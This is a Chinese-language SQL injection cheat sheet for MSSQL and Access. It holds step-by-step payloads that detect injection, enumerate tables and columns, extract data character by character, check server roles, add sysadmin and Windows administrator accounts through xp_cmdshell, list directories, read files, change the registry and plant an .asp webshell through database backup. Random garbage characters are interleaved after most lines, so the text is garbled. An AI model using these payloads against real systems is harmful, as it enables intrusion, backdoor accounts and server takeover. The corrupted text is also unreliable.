1.判断是否有注入;and 1=1 ;and 1=2 ]
� bM)t<�
2.初步判断是否是mssql ;and user>0 {@H6H�q��D
\f]k� ��CB
3.注入参数是字符'and [查询条件] and ''=' kw��>v:F<M
�_X�^1I�aL
4.搜索时没过滤参数的'and [查询条件] and '%25'=' %+��@�O#�P
�m'Amli@[�
5.判断数据库系统 9_q#W�'/X
j�~2�{lCT
;and (select count(*) from sysobjects)>0 mssql �*]�ly0nP�
�?J%1#1L"/
;and (select count(*) from msysobjects)>0 access 4,bv)Im+ `
oI0��M%/aM
?Nup1�!�D
�p�#0��1gB
6.猜数据库 ;and (select Count(*) from [数据库名])>0 u!!Y=!y*<
-�E^vLB�)O
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 03|PYk 6EW
i�2@VB6]�?
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 #Z�J _�T`l
0Z�T5bg�_M
9.(1)猜字段的ascii值(access) _D���+}�q_
sd��,J��3
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 8>trS=�;n�
>QjAoDVX�?
(2)猜字段的ascii值(mssql) X>�1,�!I9�
�u�8g�S<�\
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 M`. tf_��x
%��z��/hf�
10.测试权限结构(mssql) _�K`wG}YIE
Y#��!UPhg<
�*EOdEFsR/
�E=j��Ni��
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- aH 4c02s$
�un)4eo!�7
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �t|H^`Cv�6
=+/�eLK�G�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- P?��8GV%0$
w�&$`c�D��
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 1%EBd��%`#
)j���U)_To
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- H(����R1o~
1/Rs�ptN"v
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- {\�S+#W��\
VbJi�Zw(aR
;and 1=(select IS_MEMBER('db_owner'));-- ]Uw<$!$-]s
M�3�J#�'%$
3[\iQ*d }B
2>|d�F~��"
11.添加mssql和系统的帐户 ]��=�.\�-K
�LUG;(Fko
;exec master.dbo.sp_addlogin username;-- q�Hs��UP;7
;exec master.dbo.sp_password null,username,password;-- �^@��I� ��
��!,l9@eJQ
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ��+1Vjw�'P
(h�TC�K8HK
;exec master.dbo.xp_cmdshell 'net user username password pA`+h�Q�NN
S\''e`Eb"5
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �#hW;Ju7�3
iDN;m�`��a
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 8;z6=.4xtg
R?v�>Q` Qi
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- s�J#�4(�r`
�M^MdRu���
^�g*�pGrl#
INcg S �MM
12.(1)遍历目录 �*Nw&_<\9Q
�LG-y]4a}
;create table dirs(paths varchar(100), id int) kv8�F��ko�
un�shH��<�
;insert dirs exec master.dbo.xp_dirtree 'c:\' #OBJ��zf*p
2]I4M[�|&z
;and (select top 1 paths from dirs)>0 �@_U��;�9)
~oI1�zN�z/
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) &/mA7Vf>eR
yN~dU0.G6!
�4�S,`bnmB
���/��rg*p
(2)遍历目录 ;E@G`=0St�
(2$(
?-M��
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- &Q+Ln,(&L�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ��nFE�4�qm
dODt�(�J}%
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ;ToKJ6hN|*
q/4YS�0CqE
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 UH]l9�Aq$P
umD!��2�
w
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 W4hbK�9�y
�Lk~ho?^`�
D-�8O+�.@�
@�[���5�xq
13.mssql中的存储过程 A�~Y^�V�En
Z��Piq-q��
xp_regenumvalues 注册表根键, 子键 0QPH}Vi5�}
�/<E5"M�m%
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �:{qv~�&+C
�(EK"V';��
xp_regread 根键,子键,键值名 �a-�l;�vDs
��[E+$?�a=
;exec xp_regread +���#��GQ,
*\�=.<|H�Z
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ��7w�
37�S
f>aEkh6u�9
xp_regwrite 根键,子键, 值名, 值类型, 值 Wi[�~fI8^!
9UK�p?SIF�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 !lEY=1nHOJ
�.7i�` (F)
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �Y�3r%�B9~
%FX�fqF9�
xp_regdeletevalue 根键,子键,值名 �m<{<��s T
�8aO~/i:(.
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �!6s"]WvF�
�f�` :i.Sr
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �7h6,c�/<
)N=NR2xB�Z
4Fp0ZV�T��
+�|bm�T�
14.mssql的backup创建webshell 4D[��'�^q�
�gN24M3{C
use model 6:q"�l\n�>
x�Z|Y�?R5m
create table cmd(str image); �v�J\pR~?�
e?_@aa9~@{
insert into cmd(str) values (''); F;=4v�S]�\
BhM��'@�g*
backup database model to disk='c:\l.asp'; bhkUK�x��d
Eq$&qV-?�(
�p!sWYu�i�
v�k*�=�4}:
15.mssql内置函数 ?�_"+^R� z
}�b=}u�iR#
;and (select @@version)>0 获得Windows的版本号 'd+N��Vj{C
��#�#@$�|6
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �9Xl`pEh�C
� PZ�{Dv'C
;and (select user_name())>0 爆当前系统的连接用户 f��>pi�Hh?
�Jrg2/ee,*
;and (select db_name())>0 得到当前连接的数据库 2zVJ��v�n7
�S}$r>��[t
T�UH���i5K
q4}PM[K?=\
16.简洁的webshell QmLF[\�Oo_
Q�3|�T':l4
use model ~_Lr=C�D;4
n)�� k��1
create table cmd(str image); F>]�m���3(
;��]gP@�h/
insert into cmd(str) values (''); �Tj�HwjRa�
JJ{9U(`_y6
backup database model to disk='g:\wwwtest\l.asp';
